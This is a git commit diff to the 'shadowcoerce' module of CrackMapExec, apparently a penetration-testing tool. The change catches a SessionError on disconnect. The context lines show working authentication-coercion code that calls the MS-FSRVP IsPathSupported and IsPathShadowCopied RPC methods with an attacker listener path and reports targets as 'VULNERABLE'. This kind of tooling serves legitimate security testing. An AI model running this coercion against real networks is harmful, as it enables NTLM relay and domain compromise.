fix(shadowcoerce): catch error on session disconnect

main
Marshall Hallenbeck 2023-03-24 14:07:34 -04:00
parent 67bc50ca44
commit bbc1803b2b
2 changed files with 14 additions and 3 deletions

View File

@ -10,6 +10,8 @@ from impacket.dcerpc.v5.dtypes import BOOL, LONG, WSTR, LPWSTR
from impacket.uuid import uuidtup_to_bin
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE
from impacket.smbconnection import SessionError
class CMEModule:
@ -52,7 +54,10 @@ class CMEModule:
logging.debug("Using the default IsPathSupported")
result = c.IsPathSupported(dce, self.listener)
dce.disconnect()
try:
dce.disconnect()
except SessionError as e:
logging.debug(f"Error disconnecting DCE session: {e}")
if result:
context.log.highlight("VULNERABLE")
@ -61,6 +66,7 @@ class CMEModule:
else:
logging.debug("Target not vulnerable to ShadowCoerce")
class DCERPCSessionError(DCERPCException):
def __init__(self, error_string=None, error_code=None, packet=None):
DCERPCException.__init__(self, error_string, error_code, packet)
@ -76,6 +82,7 @@ class DCERPCSessionError(DCERPCException):
else:
return 'SessionError: unknown error code: 0x%x' % self.error_code
################################################################################
# Error Codes
################################################################################
@ -103,29 +110,34 @@ class IsPathSupported(NDRCALL):
('ShareName', WSTR),
)
class IsPathSupportedResponse(NDRCALL):
structure = (
('SupportedByThisProvider', BOOL),
('OwnerMachineName', LPWSTR),
)
class IsPathShadowCopied(NDRCALL):
opnum = 9
structure = (
('ShareName', WSTR),
)
class IsPathShadowCopiedResponse(NDRCALL):
structure = (
('ShadowCopyPresent', BOOL),
('ShadowCopyCompatibility', LONG),
)
OPNUMS = {
8 : (IsPathSupported, IsPathSupportedResponse),
9 : (IsPathShadowCopied, IsPathShadowCopiedResponse),
}
class CoerceAuth():
def connect(self, username, password, domain, lmhash, nthash, target, pipe, doKerberos, dcHost):
binding_params = {
@ -170,7 +182,6 @@ class CoerceAuth():
logging.debug("Successfully bound!")
return dce
def IsPathShadowCopied(self, dce, listener):
logging.debug("Sending IsPathShadowCopied!")
try:
@ -200,4 +211,4 @@ class CoerceAuth():
logging.debug("Attack may of may not have worked, check your listener...")
return False
return True
return True

0
tests/README.md Normal file
View File